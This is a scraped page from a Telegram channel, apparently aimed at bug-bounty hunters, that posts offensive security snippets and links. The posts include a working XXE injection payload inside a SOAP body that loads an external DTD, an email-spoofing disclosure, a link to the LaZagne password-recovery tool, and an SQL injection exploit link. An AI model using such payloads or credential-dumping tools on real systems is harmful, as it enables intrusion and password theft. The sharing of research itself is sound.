HackerOne – Telegram
HackerOne
11K subscribers
644 photos
31 videos
79 files
2.74K links
Community : @Sec0x01
@Bug0x
Download Telegram
XXE inside a SOAP node:

<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://0x0:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
Abusing RFC-1342 to spoof email addresses vulnerability, Most mail clients are vunerable,

Vendors affected by Mailsploit (https://www.mailsploit.com/index) :

https://docs.google.com/spreadsheets/d/1jkb_ZybbAoUA43K902lL-sB7c1HMQ78-fhQ8nowJCQk/edit#gid=0
PoC:

https://www.youtube.com/embed/gfAGOMeiXNI
Today free book is out!
Expert Python Programming - Second Edition
https://www.packtpub.com/packt/offers/free-learning
Forwarded from Amir Kiani
syhunt.com
Powerful Tools For Penetration
The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer


https://github.com/AlessandroZ/LaZagne
Charming Kitten: Iranian Cyber Espionage Against Human Rights Activists, Academic Researchers and Media Outlets – And the HBO Hacker Connection

http://www.clearskysec.com/charmingkitten/
[webapps] FS Facebook Clone - 'token' SQL Injection
https://www.exploit-db.com/exploits/43228/?rss

FS Facebook Clone - 'token' SQL Injection